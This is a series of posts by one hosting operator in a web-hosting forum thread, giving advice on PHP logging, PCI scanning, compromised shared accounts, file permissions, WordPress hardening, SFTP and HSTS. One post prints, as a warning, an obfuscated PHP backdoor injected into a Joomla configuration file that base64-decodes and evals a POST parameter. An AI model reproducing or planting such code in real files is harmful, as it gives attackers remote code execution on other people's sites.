Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.
 
  • Post
  • Reply
nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

tj9991 posted:

After five months of hosting with Apis Networks I have cancelled and moved to Linode. I do not recommend Apis Networks for anyone planning on using PHP.

I experienced issues getting PHP to report errors rather than serve a blank page. Referencing multiple PHP and .htaccess methods of turning on this feature, I never fully resolved the issue. The tech support I received was mediocre. Following their instructions exactly did not solve the issue.

Frustrated, I looked for a new host. I have known of Linode for some time, but the prices were too steep for small projects. Deciding to give it a try, I set up a node with Nginx, PHP FastCGI and MySQL. Having root access is a breath of fresh air after using shared hosts for years. I doubt I will be leaving Linode any time soon, unless a competitor can provide better specs for the price.

Side note: pages are loading 5-10x faster on Linode than on Apis Networks. The Linode data center in CA may be much closer than Apis Networks (I reside in WA) but I doubt it would make such an impact.

I handled your issue. The problem was two-fold, first you designated a separate file to log errors outside the default, which merges Apache and PHP errors into /var/log/httpd/error_log. Ownership of the log file precluded the HTTP server from logging errors. Permissions still was not changed when I examined your setup further. Second, the error reporting level configured via .htaccess was downgraded, which excluded E_WARNING and E_NOTICE types (9999 or so if memory serves me correct). Only fatal errors would have been logged even if permissions were corrected. PHP documentation recommends using 2147483647 as your error_level in a .htaccess directive.

Odd you had such a speed discrepancy. If you still want to troubleshoot speed issues, send me a PM or e-mail with your IP and traceroute to 64.22.68.16, which is based in Atlanta. It may be a gross exaggeration as server loads are minor, around 0.25-0.5 on Helios around the clock.

edit: E_NOTICE/E_WARNING

nem fucked around with this message at 01:21 on Feb 21, 2013

Adbot
ADBOT LOVES YOU

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

LordMaxxie posted:

If you have cPanel, I believe you can get a McAfee's PCI scan (every 3 months) for free. Couple that with the self assessment questionnaire and you're right to go.
As for when the scan finds vulnerabilities, you'll need to fix them of course. This is where you need a system admin, if you can't do it yourself.
A few names come to mind such as Rack911, AdminGeekz or rackAID. It will set you back though.

If you don't have cPanel, PCI scanning will be costly. I think Trustwave was the cheapest when I was looking, it comes with an SSL as well.

Apart from that, there's web hosts which combine all of the above for an additional fee with their hosting services.


But as above, a merchant service can store the card info for you. Nothing is infallible.

I'd caution against Trustwave, having been on the administrative end of their scanning. Most PCI scanners load up Nessus or another variant with minimal intelligent rulesets to factor in backports from Redhat Enterprise Linux/CentOS. Trustwave, for example, will scan the major/minor of OpenSSH and exclude patch levels that are backported from RHEL to amend a CVE. I've had clients escalate verified CVE patches from Redhat to Trustwave without success.

Additionally, I've used SecurityMetrics for PCI scanning that was bundled with FirstData at the time. Very similar results with whitelisting CVEs that could not be physically exploited with the given environment, but based upon the pattern match, was deemed "vulnerable". FirstData cannibalized that partnership and setup Rapid Comply. Six month and 2 scans in, so far so good. There hasn't been any false positives.

Unless you know your environment inside-out and have strict policies in place to safeguard credit card data, use a third-party to handle credit cards. FirstData provides recurring billing through their system, and they've been fantastic since placing them in a bidding war with Elavon for merchant accounts a couple years back.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

DarkLotus posted:

Serious question... If a hosting provider does not offer phone support, is that a deal breaker for you? Why?
I mean, what do you really need to get on the phone for if the support tickets are answered promptly and live chat and instant messenger are readily available.

I'll opine from the opposite side of the fence:

Phone is an enormous time sink compared to e-mail. I'll handle 2-3 tasks concurrently ~40% of the time every day. If I have a window open for issues, e-mail is active in the background. If I need to handle a major issue, phone is silent and e-mail is suspended. You can easily interleave multiple tasks while you're waiting on a response for someone or waiting for task to finish whereas with phone it's an attentive waiting game for the client to type in a password, then realize only after submitting that a mistake was made in the password or pedantically spelling out a URL letter by letter.

Phone is kept for emergency situations only, but even then if there is an emergency (DoS for example), phone goes on silent and other forms of communication are used to address en masse, particularly Twitter.

I always enjoy the question of, "well, when you do you expect it to get fixed?" to which the only genuine answer is, "the time is would have normally taken plus the time spent on the phone explaining this to you."

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Arboc posted:

If addr.com is just your DNS host (and not the registrar) then you probably don't need to transfer the whole domain to a new registrar, and you shouldn't be at risk of losing control of the domain itself. You'll still probably have to find a new host, and you may have to work around issues trying to migrate the individual pieces; I've seen some smaller all-in-one web companies that make things needlessly difficult when you try to take matters into your own hands.

Valid point. Can we update the OP to include a list of hosting providers that make things unnecessarily encumbering to accomplish? EPP-restrictive registrar transfers, non-existent DNS administration, inaccessible file retrieval, etc. Basically a blacklist of shoddy support to help others steer away from these situations, because we're here to help others not go down the same path... and over the years the record is starting to track.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

fletcher posted:

I've had a dedicated server through Future Hosting for years in their Chicago DC and it's been great. Up until recently that is, when my download speed will slow to a 32KB/s crawl for hours on end. During the slowness I can speedtest my connection and get 3MB/s. I was also able to download a test file on the server from an AWS machine and it hit 10MB/s. So both me and the server have plenty of bandwidth to spare, is it just my routing that is hosed or something? Too many people around here watching Netflix?

Does it happen continuously during set intervals or sporadically? If so, network congestion somewhere along the path between your connection and the data center (most likely data center). You could use something like webpagetest.org with a simple page stuffed of data to ascertain download speeds from other places across the globe - or - just do a traceroute (mtr/winmtr) and look for congestion via high pings.

If sporadically, it's probably a Broadcom NIC :argh:

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

fletcher posted:

It sounded pretty conclusive. I've been able to reproduce the slowness from a completely different locations in California now. They asked for the mtr report and I provided it, and they said there's no indication the issue is with something they control.


What causes that anyways? And for the reverse path, that's just running mtr from the server to me right?


At any rate, Future Hosting offered to make an exception and give me a server in their Santa Clara data center (with double the disk and ram) so I'm gonna take them up on it. Hopefully that will resolve my issue!

Yes, it's just a mtr from the server to your IP. Dropped ping replies are caused by network policies that throttle or filter echo replies out entirely. There could be QoS implemented somewhere upstream in the network. That would be evident in your reduced bandwidth throughput during peak hours, but not necessarily ping times.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

cstine posted:

During my "career" doing random IT contracting stuff, that was almost EVERYONE I dealt with.

It was a cost, so don't spend any money. Your website making you $50,000 a month in sales? Can't afford a $129 a month dedicated box to fix the performance problems your poo poo VPS has!

Except then your poo poo VPS dies, and WHY DIDN'T YOU FIX THIS becomes the new mantra.

The hosting gig seems to be a little better - we don't do VMs in any form, at all. So we've already weeded out the super-cheap types, and generally the customers that are left don't throw a giant fit where it's all about the cost, and nothing else matters.

I think there's an idiom to express this fallacy...

Yes: penny wise and pound foolish.

Kiva several years ago hosted their non-profit charity through Dreamhost, and after a couple months once the goodwill charity exploded, it - to the owners' prudence - seemed practical to remain with Dreamhost remitting $6/mo in hosting fees while bringing in $10k in charitable contributions. Then, growth propelled and service slowed down as Dreamhost amassed more clients onto the server until a move seemed onerous. Rather than jumping to a dedicated server for $100/mo at the time, the owners decided it to be salient to complain on the forums about the subpar service. It fell upon deaf ears.

Decision-makers need to decide what is right. Cutting corners, cutting costs, and zapping a lifeline to your business proves nothing more than your impracticality and reluctance to believe in an idea. I'm not for dropping $300/mo in a concept; in fact, I spent a couple years as a sole proprietorship. I am, however, advocating that people need not be stupid in evaluating your future plans. Look at short-term growth. If your growth is climbing, then anticipate a positive trajectory. If your growth has stagnated or worse: plateaued, then evaluate a graceful departure. Don't flip-flop these strategies by building crap for growth and growth for crap.

It takes just a little bit of sensibility, and that's the problem I've seen time and time again within the hosting industry. :corsair:

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

onionradish posted:

I just switched a client from a crappily-managed Rackspace reseller account to Bluehost. During the time gap between DNS switchover, some emails went to the old server. I'd like to get access to those emails through webmail or something before we decomission the old servers.

The old reseller is claiming no ability to access those emails since they're "only accessible" by web/mail.hostname.com (which has since been transferred to a new host), but has proven himself to be a lazy gently caress whose answer over the last several months has always been "can't help ya" regardless of the context, so I don't trust him.

Are we really not able to access mail stored on the previous server, even through webmail, or is my mistrust of the previous host justified?

Mistrust is justified. Most mail is stored as Maildir, so it's a matter of copying the single-file messages over as-is to the new server.

If you have your old IP address handy, edit your hosts file and add a DNS entry for mail.hostname.com to the old IP address. You will be able to pull up webmail on your old host. But then again, it's just sloven mismanagement by your old reseller. They can provide you with the messages should they choose to do so.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Rufus Ping posted:

Paradoxically the most professional and lowest-bullshit registrar I've been with is also one of the cheapest, internet.bs. This may be because both qualities are valued by their original customer base, professional domainers with large portfolios.

Never bite the hand that feeds.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Skywalker OG posted:

Looking for some help. My employer's website was defaced. We use Hostgator currently. It seems like they've been compromised because I created a support ticket a week ago and when I called them for an update, they said that they have hundreds of support tickets and I'm rather far back in the queue. They then referred me to a couple of website antivirus / firewall providers.

I was told not to do anything until Hostgator support could take a look, but it they said it could take over a month for them to get to us. We currently have 1 domain and 5 subdomains, a shop using Cubecart, and email addresses using Google Apps but are looking to expand on the number of domains and websites we have.

I think the best course of action for us would be to upload a backup (I need to check if we have one) to a different web host, update the DNS, and change all passwords.

Is this a good course of action? Also, are there any recommended web hosts? I was looking at Lithium Hosting in the OP and the prices seem pretty good.

Once defaced, your files aren't secure either, since on those setups every single file (web assets, maybe e-mail) on your account has the same accessibility rights as that file initially defaced. Hackers today will inject code into files that can only be triggered with the right combination of query parameters, so unless you pass along the right GET request, it'll appear safe. Nuke your Cubecart assets or check for files modified within the last week (find from the shell works: find . -mtime -165 -print ). Check anything modified within the last week carefully, looking for arbitrary code that doesn't belong. If it's there, assume your files have been compromised too as a consequence of running everything under a single user.

Once your account is defaced, and you run php-fpm or php-cgi under the same user as your account (big box hosters do this for resource accountability), assume all files have an equal chance of being tainted with malicious bootloader code or viewed by a third-party.

Also, good opportunity to update Cubecart, since there are some vulnerabilities in the wild.

Sorry about missing your live chat request earlier. Had to head up to North Atlanta this afternoon for a funeral I had just found out about last night. :corsair:

Edit: thought about this a little more tonight to draw a parallel: consider having 2 keys. One keys is a skeleton key that opens every door in your house. Another key opens just the basement stuffed full of junk. An intruder grabs a hold of your basement key - not an issue; you have an understanding it may get broken into eventually. An intruder grabs a hold of your skeleton key - problem, insofar as he now has access to every room in your house and every piece of valuable good/information.

It's the same issue when you run your WordPress/Drupal/Joomla! under the same user as your personal files and other web page assets. When you run your site on Hostgator and EIG's siblings, that's going to happen when only one user exists and that's shared between your web files and your personal files. You have one key and it is a master key. If that's compromised, then you're in a world of hurt, because now they have access to your e-mail, if stored on the same server, SSH keys, and depending upon partitioning likely other domain content.

So please be mindful. Hacking isn't a rudimentary point-and-click WinNuke like a decade ago (nor are DoS attacks). With time comes dissemination of knowledge and hackers too build better tools to carry out more sophisticated, undetectable attacks. I've seen it in post-mortem analyses of hacked accounts that were time and time again a victim of outdated software. Whenever there is a breach, there is curiosity too of what else lurks on your site. Had something sensitive nestled among your files? Now you have a big problem on your hands.

TLDR: flatten and reinstall if you're unsure of the scope of damage

nem fucked around with this message at 05:42 on Jan 16, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Skywalker OG posted:

Sucuri is much cheaper at $99 per year, but realistically we would drop them after they have fixed the problem to a satisfactory degree.

This is why security relapses occur. If you've proven up along the managerial chain unable to keep a site secure, what realistically makes you think this won't happen again?

Thalagyrt posted:

If you have the capability (you most likely don't on shared hosting) you should set up your web worker as a completely separate user from the user that actually owns your web directory. Doing so would entirely eliminate a lot of the big pain point you're seeing and make a web application firewall mostly unnecessary (it still could save you from some things)... It might be possible with nem's kick-rear end custom panel, but I can't speak to that directly as I don't know much about what he's built over there.

Yes, this is the correct approach, and yep that's what we've done for a long time.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Skywalker OG posted:

We're an extremely small nonprofit organization full of old people with no IT department and historically something bad has had to happen to us in order for our board of directors to care about it enough to act.

I can make recommendations to move to a web host that is more secure than Hostgator and overall implement better practices but unfortunately it'll take some convincing to add more monthly / annual fees to the operating budget.

I know it's extremely shortsighted, but it's the situation I'm in and it's really frustrating.

Vote the least useful director off your board and accommodate a $99/year budgetary increase. Your reputation and reliability are more important and more costly than $8/mo. If your organization has issues accommodating a $8/mo increase, then there is some administrative fat/misconduct within the organization that go beyond this thread.

Sites have 4 vulnerable vectors ordered from most to least likely to be vulnerable: (1) compromised user accounts caused by lack of AV software typically penetrated by unsafe browsing habits, (2) software in place of your web site, (3) server software itself, (4) serendipity. 1 and 2 are interchangeable depending upon how well you keep on top of things. Make it a habit to check the vendor's web site once a month, maybe the first, to see if there's a new version available. Incremental upgrades are always easier than major upgrades, because you were forced to upgrade in light of getting hacked.

Based upon your information, I don't believe exclusively HG is to blame. You might do well with a VPS. You might do well with shared hosting from any recommended brand in the first page. But, you might relapse and continue to do so in perpetuity until your organization gets its head out of its rear end and takes its accountability more seriously.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Skywalker OG posted:

You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far.

Just to give you an idea of the sophistication now, this is a client's configuration file modified by a hacker that I came across today via feedback loop:

php:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].
     $sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].
     $sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n88b749'])) { 
eval($s21(${$s20}['n88b749']));}?><?php
class JConfig {
    public $offline '0';
    public $offline_message 'This site is down for ma
So you've got a Joomla! configuration, along with obfuscated code. Most of this is automated now: scramble some chars, create a function out of it to bypass simple mod_security detection, and when you have the right key base64 decode + eval the command, letting all hell break loose. It's slipped into the affected file. So long as $_POST['n88b749'] isn't set, the page appears "safe".

Typically it's one line, but I had to break it into a few lines to make it play nice with the forums.

The only reason why this happened is because the file is permitted alteration, by the web server user, by its permissions (client got lazy and applied 777 to all files). If the file had permissions 755, and a different owner than that under which the web server runs, then the web server could have read it, but not modified it. With Hostgator and other EIG brands, you lose this added security, because the attack happens under the same user as the rest of your files. Unless you enumerate every file and scan for anomalous changes (like this), then there's no guarantee your frontend software is safe.

:words:

nem fucked around with this message at 09:51 on Jan 19, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

McGlockenshire posted:

Sooooooo, CGI is the problem instead of 0777 permissions?

Proper file ownership and permissions go a long, long way towards making even the most stupid vulnerability in anything less likely to exploit the entire machine instead of just the one account.

So many hosts get this wrong that creators of scripts designed for shared hosting often have to actively recommend insecure permissions just to work around file ownership stupidity. It's a self perpetuating problem, no matter what language the offending scripts are written in, no matter how they interface with the rest of the system, CGI, WSGI, PSGI, FastCGI, whatever bullshit Java does, whatever.

No, the issue is any system in which the web server or process lifecycle operates under the same user that is privileged with access to the rest of the user's files. CGI/FCGI/FPM whatever wrapper you're using that switches users to process a request is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777. Damage scope is changed (all your files vs all of someone else's).

777 is bad because members of your group can run amok and modify any of your files. 717 works, if you keep 1 user, the web server in the other group, because there are no other members of the other group that can touch your assets.

Sometimes 777 doesn't work because it's a mixed environment of other users. In those cases, you should use run the web server as a separate user and grant write permissions through ACLs to those files which the web server must write/modify, e.g.:
code:
user::rwx
user:apache:---
group::r-x
mask::r-x
other::r-x
File still appears as 755, but with an additional security set.
code:
# sudo -u apache /bin/cat
sudo: unable to execute /bin/cat: Permission denied
For example, when setting up WordPress the best things you can do from a security standpoint are:
  • run the web server under a different uid
  • use manual update mode, plugin your FTP password
  • use setfacl to permit write access by the web server to wp-content/uploads/
  • remove handler support for script/php files under wp-content/uploads/

It's not perfect, but it's pretty close to being so.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

DarkLotus posted:

On a multi-user system, you probably don't want to make something world-writeable if your already concerned about it being group-writeable.

Depends upon setup: as long as every user with access to a particular filesystem slice is part of the group, except for one user, the web user, then 717 works. 1 would be applied to group, 7 to others not matched in the group per discretionary access control implementation. It's a dumbed-down version; ACLs or SELinux are better, albeit more intense, options.

Once you have another user outside that group with the same filesystem visibility, then 717 fails. It requires a combination of jailing and application access restrictions to properly implement.

\/ - ACLs (setfacl command) and SELinux. Setup works great on a VPS. Not so much for massive hosting companies without the tweaks as noted above.

nem fucked around with this message at 01:50 on Jan 27, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

eightysixed posted:

I've not used WordPress in quite sometime, but I remember having to set-up sFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and not utilizing sFTP what's the point? Unless I'm missing something, in which case eightysixed derps all day every day.

Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server and network traffic will pass outside the server onto the network, liable to be sniffed. If the FTP server resides on the same server as WordPress, then use localhost. Traffic won't pass outside the server, unless the server is compromised, and a privileged user is capturing local traffic, if so, then you've got bigger issues on your hands with possible rooting. FTP password in that case will pass on a TCP socket connected locally on the server bypassing switch. SFTP requires ssh as a wrapper, so there's a dependency upon the host to support ssh on the account. I hope in some time that WordPress will integrate Auth TLS support into its built-in FTP client. That solves the issue of encrypting the endpoint without relying on ssh.

If you're going over an insecure, public connection with WordPress, then your wp-admin portal should be secured with SSL. That way not only is your admin password encrypted, but also your FTP credentials.

Using FTP, and running a separate web server, creates a permission partition between what you can access and the web server. It's the same reason we have UAC in Windows :downs:

edit: nuances

nem fucked around with this message at 19:54 on Jan 27, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved
/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges.

Thalagyrt posted:

SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript.

It ships with openssh and on vanilla Linux platforms ties into the sshd PAM provider. Sure, you can separate these two, but going back again to contrived scenarios I don't think most providers will go through the hoops to separate ssh and sftp-server. 90% of those layouts will look like:

code:
root      \_ sshd: sshuser [priv]
sshuser     \_ sshd: sshuser
sshuser        \_ /usr/libexec/openssh/sftp-server
Looking at big box providers like HostGator, it's not provided on shared hosting, and I couldn't imagine it being an option without them explicitly enabling ssh. I assume there are some pure SFTP server implementations out there that don't rely on ssh as a wrapper, but I'm working off what I know and what I encounter in my field :) Auth TLS has a better adoption chance, because it's an extension of common FTP servers like vsftpd, pureftpd, and whatever else is in use.

nem fucked around with this message at 18:55 on Jan 27, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Thalagyrt posted:

I was specifically addressing this:


which is absolutely incorrect. sftp-server is not in any way shape or form an implementation of the FTP protocol. SFTP and FTP are like Java and JavaScript - similar in name only.

:doh: need coffee

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Rufus Ping posted:

you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting

Yes, raw traffic capability is a broader, and more suggestive term. Original post has been amended.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Biowarfare posted:

same thing with persisting sessions across http to https: if you land on http, redirect to https for login, your page is ALREADY insecure, and there is no point in doing so.

HSTS fixes that, but there's always laggards in adoption (IE, coming in 11). Even a redirect via mod_rewrite to https would leak cookie and other sensitive data in the request if the https request flops back to http. So we're probably, based on IE6 obsolescence, 10+ years from HSTS becoming fully-implemented by most web users. :classiclol:

Additionally, you can set cookies as secure. If a request goes from https to http, and a cookie is marked as secure, it won't get transmitted in the request. Request URI will still leak in that case.

edit: coulda/woulda/shoulda

nem fucked around with this message at 17:35 on Jan 30, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

cstine posted:

TimThumb.php.

It's like herpes. It's everywhere, you can't get rid of it, and it'll cause endless problems!

Oh, and it's EOL so no more patches and it's STILL in zillions of themes and plugins.

And I'm not sure WHY you need it. Wordpress has the functionality built in.

... and it still insisted on using the "DOCUMENT_ROOT" server variable when storing thumbs. If you used mod_rewrite to serve content from another location, it altogether ignored WordPress requiring custom patches.

:suicide:

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

BlackMK4 posted:

Eh, figured out I don't have to install it. Just use the binary compiled with make. Thanks :)

--prefix=/usr/local is standard practice. Although, it depends on your medium. I know for the KB, which is built on WordPress, I've relied on Jetpack that works well to discriminate bots from humans. Webalizer, Analog, and AWStats (the big free 3) have been rather dormant for some time ceding to bigger commercial players in the market, chiefly Google Analytics and other value-added services that provide bundled analytics.

I'd just stick Google Analytics into your site and go from there. You'll get a better resolution of visitor traffic over Webalizer/Analog/AWStats that provide only baseline traffic, i.e. how many spam bots have pulverized your site in the last 24 hours.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved
Oopsie doodle...



Press release

Edit: better quality discussion of folks still silly enough to use them via WHT

nem fucked around with this message at 04:46 on Apr 1, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Anaxite posted:

Except Chrome for Android, which gives the error "NET::ERR_CERT_AUTHORITY_INVALID".

On top of that, my phone is the one Android device that doesn't have that problem. I feel like I'm stepping into black magic territory and I'm not even sure what tools I could use to research this.

Is there a possibility the root certificates installed on that Android are out of date? What Android version is the phone running?

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Anaxite posted:

I tested this on Android 4.2.2 and 5.1.1, Chrome versions 43 and 44 beta.

Only time I've seen that happen then is when the intermediate certificate isn't present in the handshake, i.e. in Apache SSLCertificateChainFile is missing or supplying an erroneous certificate - you can send as many as necessary, client will only use those certificates applicable to resolving the chain. At least one path must be sent by the server (i.e. not an additional download) resolving up to a certificate trusted in its store. That store would be the root certificates in the phone's OS.

So either the chain isn't sent or the CA (gandi) isn't trusted in the root certificates that ship with both OSes (unlikely).

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

reddit liker posted:

code:
reverie@apollo ~ $ wc -l /etc/nginx/nginx.conf 
294 /etc/nginx/nginx.conf
i would hate to have to write this loving config all over again

setting up hsts, ocsp stapling and spdy was a bit of a bitch, plus all of the performance poo poo

Install etckeeper and push your repo to a private repo on github or another server.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Biowarfare posted:

this is still the personal favourite ive g otten from a hosting provider



Just got one from 1and1 regarding some undocumented blacklist heuristics they implement (or a faulty network on their end):

quote:

Thank you for contacting us.

Sincerely do apologize for the inconvenience. See details below.

~$ host 64.22.68.2
2.68.22.64.in-addr.arpa domain name pointer image.apisnetworks.com.

~$ host image.apisnetworks.com
image.apisnetworks.com has address 64.22.68.2

~$ host 2.68.22.64
Host 64.22.68.2.in-addr.arpa. not found: 3(NXDOMAIN)

2.68.22.64 shoud be pointed back to 64.22.68.2, however, it resulted to not found.

If you have any further questions, do not hesitate to contact us.

When your hiring manager consists of a pigeon with a keyboard :psyboom:\

Edit: and the cycle continues :smithicide:

nem fucked around with this message at 00:38 on Sep 27, 2015

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

hayden. posted:

I use DigitalOcean. I recently tried to SSH into my server that I hadn't SSH'd into in a long time. The private key I have has definitely not changed, but I get a "Server refused our key" error. Root password doesn't work and I'm not sure there was one originally (just the key). I tried resetting the password using DO's control panel and it didn't work. Trying to login using the console on DO's website has me log in as root, change the password, then immediatly kicks me out to login again. Logging in with the new password works for a split second but then kicks me back to login. I have no idea what I configured here.

Am I hosed? Is there something obvious I should try? Is it time to waste hours of my life figuring out how to use the recovery mode that DO provides?

I opened a support ticket and they just said to use the recovery mode.

Did you foul up one of the PAM modules? Or did you get hacked and the hacker, being a douche, add "exit" into your .bash_profile?

I'd try booting up into single-user mode, then logging in from whatever tty terminal DO provides.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

hayden. posted:

If I had to guess, at some point in time I was following some tutorial that recommended disabling the ability to log in as root.

Booting into single user mode doesn't seem like an option. The only way to do so would be to do a power cycle and open the console viewer to try to intercept some sort of bootup screen with a keystroke, but none shows that I can see.

I loaded the recovery kernel except the space bar doesn't seem to work in it. Can't even run fsck because I can't add a space to have a '-p'. This sucks.

Pass "single" to your initrd to force single-user mode, if you've got the ability to edit your boot options. I'm not terribly familiar with DO's interface. On Linode at least you can toggle single-user bootup in the VM config.

Next time don't follow what someone else has written without comprehending its implications :science:

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Thalagyrt posted:

Hell, $5.95/mo is basically the same price as a small VPS, which would give you a lot more control.

And a lot more responsibility to keep your machine secure, which often don't go hand-in-hand.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved
WordPress will handle minor updates automatically. And there's a plugin to coalesce major updates into this automatic update process.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Thalagyrt posted:

The catch to that is that you have to give WordPress write access to itself, which is a patently bad idea if you care at all about not getting owned.

Would you rather take 1 fist or 2 fists up the rear end? Neither solution is optimal; pick the best worst solution. At least in this setup you can be proactive, rather than reactive. More importantly, you have less to think about, which is the OP's goal.

Alternatively, a separate user apart from the web server can own the files and that information stored in wp-config.php for automatic FTP updates. Your tradeoff is that FTP login info for this user is stored in wp-config.php, which again can lead to getting owned... Then again, if a hacker has access to one ingress, backdoor installation is so drat trivial.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Thalagyrt posted:

Nah, I'd rather give WordPress no write access other than wp-content/uploads, and explicitly disable PHP execution in wp-content/uploads. Upgrade it manually, either by relaxing permissions temporarily (if you're lazy) or ideally by pushing out an entirely new codebase as a new atomic release using something like capistrano + git, symlinking content directories in from a common shared folder. The benefit of that, of course, being that your git repo instead of web server is authoritative for what code belongs on your web server.

As soon as your application has write access to its own codebase through any means you're completely done for. Doesn't take much netsec/ops experience to know that...

A hole elsewhere in its codebase will still allow arbitrary execution regardless of whether uploads/ or themes/ are satisfactorily locked down. You might halt its spread, but compromised accounts or a newfound spam relay are just as obnoxious as a security relapse. The only practical solution is vigilance. Always be on top of updates. You can make the exposed surface smaller, but a hole is a hole and in 13 years I can only attest to one thing: end-users are a mixed bag of ability. Never assume too much.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Bob Morales posted:

How many big ugly security breaches is that for them? Ugh.

Are the DDoS's still going on?

It hit Zayo's data center in Atlanta. We were affected, as was the entire data center, including its in-house brand NetDepot. The attackers hit the edge router instead of actual machine they wanted to offline. Around 2 hours of intermittent downtime on New Year's Day :confuoot:.

Sometimes you feel bad for the network engineers who mitigate these onslaughts.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved
/\ - What he said. Got caught up in a ticket :shobon:

Thalagyrt posted:

That's not propagation - that's cache expiration. The two are very different concepts. Propagation implies that the source is pushing data to consumers, whereas the reality is that the consumers are pulling data from the source upon request and caching it.

That's senseless pedantry. When we refer to propagation typically we're not talking about replication among slaves. We're referring to cache expirations from local resolvers and at what point 95% of resolvers will pull the new records. Some upstream resolvers do violate prescribed TTLs, but for the most part propagation = cache, because propagation among slaves is drat near instantaneous.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Biowarfare posted:

http://bounceweb.com/ajax-hosting.html

oh my god
lol
this horrible keyword stuffing page
that first paragraph under 'What is AJAX?'

Last time BounceWeb was around this block, the thread turned into a shitstorm because their policies forbade ffmpeg... and sure enough the article on ffmpeg hosting is still there :rolleyes:. Oh well, let's see how many suckers that thread can ensnare.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

RAID0 :downs:

These guys haven't had any serious disasters in 30 days since rolling it out or use 2-disk setups.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

MrMoo posted:

RAID 0 on SSD is an improvement from mechanical drives, from the underlying storage perspective it is reasonable as there is already error recovery in place, you are only beholden to the controller flaking out which is likely for any other chip in the data path too.

Having no mechanical parts will certainly improve its reliability, but electronics fail. I've had everything on PowerEdge servers, from power supplies to LCD bezels, die over 14 years. Intel recorded its AFR at 0.61% for SSD over 4.85% for mechanical; of course this is 2011 and technology has only improved. Failure, however, remains a going concern. Rolling out machines with 8+ devices in RAID0 greatly amplifies that initial 0.61% risk of 1 unit failing. Whether SMART catches it or not and whether they act on it (or have the parts on site to do so) depends upon their competency. Something tells me at that price point competency isn't their strong suit.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

UGAmazing posted:


- Good speed for my WordPress website
- Working webmail (seems simple enough)
- Working FTP access (hope I'm not asking too much)
- Reliable
- Not lovely customer support

If someone could please point me in a good direction, I would be so, so, so thankful. I don't have time to waste getting something so simple to work properly. :(

Any particular reason you want to gravitate towards a big-box host that reduces your account to ink on a 10-K filing? Those are all very reasonable requests that either DarkLotus (Lithium) or myself pride ourselves on providing for clients.

Adbot
ADBOT LOVES YOU

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

nictuku posted:

I'm creating a database-as-a-service infrastructure, so providers can sell managed MongoDB, MySQL, Redis, etc to their customers.
You're competing with PaaS providers now in a highly specialized segment. While not entirely bad, what's your value proposition over other providers who do web servers, apps monitoring, etc as well? (Heroku comes to mind)

quote:

My job is to deploy clustered database and then maintain, backup, monitor, make everything fault-tolerant and auto-scaled. If the database breaks, I'm the one to fix it. Since my cost to run a 1GB RAM server is the same as running a 128GB server, I'd charge a flat fee per server. The fee would be low enough to make this super attractive to hosting providers.
So you're selling the hands time and neither the platform nor the infrastructure to run the database?

quote:

